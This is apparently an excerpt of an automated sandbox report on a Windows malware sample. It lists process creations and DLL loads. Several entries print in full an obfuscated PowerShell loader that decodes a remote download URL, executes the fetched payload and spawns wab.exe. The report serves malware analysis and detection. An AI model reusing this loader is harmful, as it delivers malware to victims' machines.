Kuve)Flere ');ratlaasene (Concolor ' Ggep$O tspgGunmal Po toChamob Ts.racan,llParad:OperaJWasteuOmstyb SteriHavgalStrikaNo petDeodoo Ef.erForpoyPaabu= Obse$V.agmBDiploo Op ygmed,tbHazariA,arynToecadEks.ee ,lepr hjskiSuper.CatapsTunenpTe.nglUnbeliSerpet.erip(,mora$ PremPDeuterSkruma Ads,kAk,ierRgskyiOverdt Be.aiPrebr)Svovl ');$Bogbinderi=$Jubilatory[0];ratlaasen
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Acetylmethylcarbinol.Ron && echo $"
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$verdensfjerneconomatic = 1;$Vastities='Su';$Vastities+='bstrin';$Vastities+='g';Function Concolor($Weaselly){$Genoptagelserne=$Weaselly.Length-$verdensfjerneconomatic;For($verdensfjerne=5;$verdensfjerne -lt $Genoptagelserne;$verdensfjerne+=6){$Tetanuses+=$Weaselly.$Vastities.Invoke( $verdensfjerne, $verdensfjerneconomatic);}$Tetanuses;}function ratlaasene($Kontrasts){& ($Protektionerne) ($Kontrasts);}$Zemas=Concolor 'Ka,riMMisaloFor,azRet.si ,ymplexponlD.scoaForts/Rug,k5cirku.Hyp,t0Stimu Runds( annuWSavori CardnReguld reecoHvi.ewAntissPrea so,mNKd,onTProdu non,l1Autoe0Kamer.I.otr0Trans;rejse Inn.WPres.iB,kenn Trkn6Stift4Super; ef e Hi,loxUdst 6Rygel4Quidd;Termo PensrProtevSiali: Semi1 Over2Marsi1Tmrer.Konto0 aria),msae jeerGSolodeKunstcfaberk frakoHypos/ lowp2Tridk0bogca1Vas,e0Damas0 ervi1Finge0Diphe1Stage K mplFMann iSwashr G,ute,udsjfCanceoFrustxsmin /Premi1Bered2Porce1 Xeno.voxe,0Antip ';$Egenartets=Concolor 'BathmU MorgsetuieeMarksrDepic-HaanlASagtmgAthaleSplitnFore,t Ther ';$Bogbinderi=Concolor '.engehpolyttTangltOv rapBridgs Tact:Grund/Optog/Snkniw,rickwAftrywDevot.SregnsP rsoeLnmo,n Sandd .ymmsD flopDysuraDaarlcVandfeImipr.Bottlc Af,eo N mamAntid/ b.skpPokinr .nsooYvonn/Exs.fd ,niflprste/Monop7 ightdVulcahAcantiSkannd .mmu7Spawn ';$Prakriti=Concolor 'Fangs>Neigh ';$Protektionerne=Concolor 'damesiGr.fie homoxM,til ';$Dournesses='Forureningskildens';ratlaasene (Concolor 'NatioSNyt ieSammetpea.a-Bedl,CNont o FrognanskatLivreeAssonn F.lkt Thic D sse-DerriPEdifiaOrgantProvih .jen Per.eTDisse: Tykn\BetonDSk.kkiOverimSti,lyUrban.LakfatFi,kexvr,retBygrn Skave-grassVFejlfaDiplol San u B egeJosfl Bombe$Lab.aDNoncooWooleu GemarUdso.nEnerge Ap.ssFlosssPreh,e KommsApoko; ,top ');ratlaasene (Concolor 'Mout.i DambfLor.e Wiver(AdscitTrocte Foras leoptAl al- LeiopPlastaOverftRetarh Tour BugseTSulai: tran\W,sseDAppleiShab,mTil.sySmnde.UnadutRligsx Ekstt trep)Marke{WhiteeD.bstxPosthioplbetBes,a}.onre;Overs ');$Unensouled = Concolor 'Tu,lieFrknec PalmhBla,koLa el .erde% hantaOraklpGodtepFrancdVarmeamaggitUntemaBedri%Beslu\UnderAMucoscFlskeeRatiot Ungry Kakol DeramOverteBourotpa,eih SognyGrisslTilbycKnl.daMe.virForh bF.riniWal,inForuroMisi.lRdstj. ,urrRUsseloSkndinRende D,mit& Ossa& flam LyskoeVul,scGdninh AcetoEnerg skr.p$Stade ';ratlaasene (Concolor 'Gr nd$ Ind,g.dhullVoda.oDespob freda Pte,lHedg,:W.llsPSp bra Reg,g Kab,aU,sidn DeciiHologsY,lloh,ende7Misco3Apo.i=Aya o(B.slac CrakmtvistdCh,rd Cubby/honeyconsla Auric$ C.raUSluednHexaceDesinnMe,dosAnenco Du.auMan.ali,trae Rentd Kuve)Flere ');ratlaasene (Concolor ' Ggep$O tspgGunmal Po toChamob Ts.racan,llParad:OperaJWasteuOmstyb SteriHavgalStrikaNo petDeodoo Ef.erForpoyPaabu= Obse$V.agmBDiploo Op ygmed,tbHazariA,arynToecadEks.ee ,lepr hjskiSuper.CatapsTunenpTe.nglUnbeliSerpet.erip(,mora$ PremPDeuterSkruma Ads,kAk,ierRgskyiOverdt Be.aiPrebr)Svovl ');$Bogbinderi=$Jubilatory[0];ratlaasen
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Acetylmethylcarbinol.Ron && echo $"
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$verdensfjerneconomatic = 1;$Vastities='Su';$Vastities+='bstrin';$Vastities+='g';Function Concolor($Weaselly){$Genoptagelserne=$Weaselly.Length-$verdensfjerneconomatic;For($verdensfjerne=5;$verdensfjerne -lt $Genoptagelserne;$verdensfjerne+=6){$Tetanuses+=$Weaselly.$Vastities.Invoke( $verdensfjerne, $verdensfjerneconomatic);}$Tetanuses;}function ratlaasene($Kontrasts){& ($Protektionerne) ($Kontrasts);}$Zemas=Concolor 'Ka,riMMisaloFor,azRet.si ,ymplexponlD.scoaForts/Rug,k5cirku.Hyp,t0Stimu Runds( annuWSavori CardnReguld reecoHvi.ewAntissPrea so,mNKd,onTProdu non,l1Autoe0Kamer.I.otr0Trans;rejse Inn.WPres.iB,kenn Trkn6Stift4Super; ef e Hi,loxUdst 6Rygel4Quidd;Termo PensrProtevSiali: Semi1 Over2Marsi1Tmrer.Konto0 aria),msae jeerGSolodeKunstcfaberk frakoHypos/ lowp2Tridk0bogca1Vas,e0Damas0 ervi1Finge0Diphe1Stage K mplFMann iSwashr G,ute,udsjfCanceoFrustxsmin /Premi1Bered2Porce1 Xeno.voxe,0Antip ';$Egenartets=Concolor 'BathmU MorgsetuieeMarksrDepic-HaanlASagtmgAthaleSplitnFore,t Ther ';$Bogbinderi=Concolor '.engehpolyttTangltOv rapBridgs Tact:Grund/Optog/Snkniw,rickwAftrywDevot.SregnsP rsoeLnmo,n Sandd .ymmsD flopDysuraDaarlcVandfeImipr.Bottlc Af,eo N mamAntid/ b.skpPokinr .nsooYvonn/Exs.fd ,niflprste/Monop7 ightdVulcahAcantiSkannd .mmu7Spawn ';$Prakriti=Concolor 'Fangs>Neigh ';$Protektionerne=Concolor 'damesiGr.fie homoxM,til ';$Dournesses='Forureningskildens';ratlaasene (Concolor 'NatioSNyt ieSammetpea.a-Bedl,CNont o FrognanskatLivreeAssonn F.lkt Thic D sse-DerriPEdifiaOrgantProvih .jen Per.eTDisse: Tykn\BetonDSk.kkiOverimSti,lyUrban.LakfatFi,kexvr,retBygrn Skave-grassVFejlfaDiplol San u B egeJosfl Bombe$Lab.aDNoncooWooleu GemarUdso.nEnerge Ap.ssFlosssPreh,e KommsApoko; ,top ');ratlaasene (Concolor 'Mout.i DambfLor.e Wiver(AdscitTrocte Foras leoptAl al- LeiopPlastaOverftRetarh Tour BugseTSulai: tran\W,sseDAppleiShab,mTil.sySmnde.UnadutRligsx Ekstt trep)Marke{WhiteeD.bstxPosthioplbetBes,a}.onre;Overs ');$Unensouled = Concolor 'Tu,lieFrknec PalmhBla,koLa el .erde% hantaOraklpGodtepFrancdVarmeamaggitUntemaBedri%Beslu\UnderAMucoscFlskeeRatiot Ungry Kakol DeramOverteBourotpa,eih SognyGrisslTilbycKnl.daMe.virForh bF.riniWal,inForuroMisi.lRdstj. ,urrRUsseloSkndinRende D,mit& Ossa& flam LyskoeVul,scGdninh AcetoEnerg skr.p$Stade ';ratlaasene (Concolor 'Gr nd$ Ind,g.dhullVoda.oDespob freda Pte,lHedg,:W.llsPSp bra Reg,g Kab,aU,sidn DeciiHologsY,lloh,ende7Misco3Apo.i=Aya o(B.slac CrakmtvistdCh,rd Cubby/honeyconsla Auric$ C.raUSluednHexaceDesinnMe,dosAnenco Du.auMan.ali,trae Rentd Kuve)Flere ');ratlaasene (Concolor ' Ggep$O tspgGunmal Po toChamob Ts.racan,llParad:OperaJWasteuOmstyb SteriHavgalStrikaNo petDeodoo Ef.erForpoyPaabu= Obse$V.agmBDiploo Op ygmed,tbHazariA,arynToecadEks.ee ,lepr hjskiSuper.CatapsTunenpTe.nglUnbeliSerpet.erip(,mora$ PremPDeuterSkruma Ads,kAk,ierRgskyiOverdt Be.aiPrebr)Svovl ');$Bogbinderi=$Jubilatory[0];ratlaasenJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Acetylmethylcarbinol.Ron && echo $"Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$verdensfjerneconomatic = 1;$Vastities='Su';$Vastities+='bstrin';$Vastities+='g';Function Concolor($Weaselly){$Genoptagelserne=$Weaselly.Length-$verdensfjerneconomatic;For($verdensfjerne=5;$verdensfjerne -lt $Genoptagelserne;$verdensfjerne+=6){$Tetanuses+=$Weaselly.$Vastities.Invoke( $verdensfjerne, $verdensfjerneconomatic);}$Tetanuses;}function ratlaasene($Kontrasts){& ($Protektionerne) ($Kontrasts);}$Zemas=Concolor 'Ka,riMMisaloFor,azRet.si ,ymplexponlD.scoaForts/Rug,k5cirku.Hyp,t0Stimu Runds( annuWSavori CardnReguld reecoHvi.ewAntissPrea so,mNKd,onTProdu non,l1Autoe0Kamer.I.otr0Trans;rejse Inn.WPres.iB,kenn Trkn6Stift4Super; ef e Hi,loxUdst 6Rygel4Quidd;Termo PensrProtevSiali: Semi1 Over2Marsi1Tmrer.Konto0 aria),msae jeerGSolodeKunstcfaberk frakoHypos/ lowp2Tridk0bogca1Vas,e0Damas0 ervi1Finge0Diphe1Stage K mplFMann iSwashr G,ute,udsjfCanceoFrustxsmin /Premi1Bered2Porce1 Xeno.voxe,0Antip ';$Egenartets=Concolor 'BathmU MorgsetuieeMarksrDepic-HaanlASagtmgAthaleSplitnFore,t Ther ';$Bogbinderi=Concolor '.engehpolyttTangltOv rapBridgs Tact:Grund/Optog/Snkniw,rickwAftrywDevot.SregnsP rsoeLnmo,n Sandd .ymmsD flopDysuraDaarlcVandfeImipr.Bottlc Af,eo N mamAntid/ b.skpPokinr .nsooYvonn/Exs.fd ,niflprste/Monop7 ightdVulcahAcantiSkannd .mmu7Spawn ';$Prakriti=Concolor 'Fangs>Neigh ';$Protektionerne=Concolor 'damesiGr.fie homoxM,til ';$Dournesses='Forureningskildens';ratlaasene (Concolor 'NatioSNyt ieSammetpea.a-Bedl,CNont o FrognanskatLivreeAssonn F.lkt Thic D sse-DerriPEdifiaOrgantProvih .jen Per.eTDisse: Tykn\BetonDSk.kkiOverimSti,lyUrban.LakfatFi,kexvr,retBygrn Skave-grassVFejlfaDiplol San u B egeJosfl Bombe$Lab.aDNoncooWooleu GemarUdso.nEnerge Ap.ssFlosssPreh,e KommsApoko; ,top ');ratlaasene (Concolor 'Mout.i DambfLor.e Wiver(AdscitTrocte Foras leoptAl al- LeiopPlastaOverftRetarh Tour BugseTSulai: tran\W,sseDAppleiShab,mTil.sySmnde.UnadutRligsx Ekstt trep)Marke{WhiteeD.bstxPosthioplbetBes,a}.onre;Overs ');$Unensouled = Concolor 'Tu,lieFrknec PalmhBla,koLa el .erde% hantaOraklpGodtepFrancdVarmeamaggitUntemaBedri%Beslu\UnderAMucoscFlskeeRatiot Ungry Kakol DeramOverteBourotpa,eih SognyGrisslTilbycKnl.daMe.virForh bF.riniWal,inForuroMisi.lRdstj. ,urrRUsseloSkndinRende D,mit& Ossa& flam LyskoeVul,scGdninh AcetoEnerg skr.p$Stade ';ratlaasene (Concolor 'Gr nd$ Ind,g.dhullVoda.oDespob freda Pte,lHedg,:W.llsPSp bra Reg,g Kab,aU,sidn DeciiHologsY,lloh,ende7Misco3Apo.i=Aya o(B.slac CrakmtvistdCh,rd Cubby/honeyconsla Auric$ C.raUSluednHexaceDesinnMe,dosAnenco Du.auMan.ali,trae Rentd Kuve)Flere ');ratlaasene (Concolor ' Ggep$O tspgGunmal Po toChamob Ts.racan,llParad:OperaJWasteuOmstyb SteriHavgalStrikaNo petDeodoo Ef.erForpoyPaabu= Obse$V.agmBDiploo Op ygmed,tbHazariA,arynToecadEks.ee ,lepr hjskiSuper.CatapsTunenpTe.nglUnbeliSerpet.erip(,mora$ PremPDeuterSkruma Ads,kAk,ierRgskyiOverdt Be.aiPrebr)Svovl ');$Bogbinderi=$Jubilatory[0];ratlaasenJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Acetylmethylcarbinol.Ron && echo $"Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"Jump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: vbscript.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: edputil.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: appresolver.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: bcp47langs.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: slc.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: sppc.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: wininet.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: winnsi.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: schannel.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: mskeyprotect.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: ntasn1.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: dpapi.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: ncrypt.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: ncryptsslp.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: propsys.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: edputil.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: windows.staterepositoryps.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: appresolver.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: bcp47langs.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: slc.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: userenv.dllJump to behavior
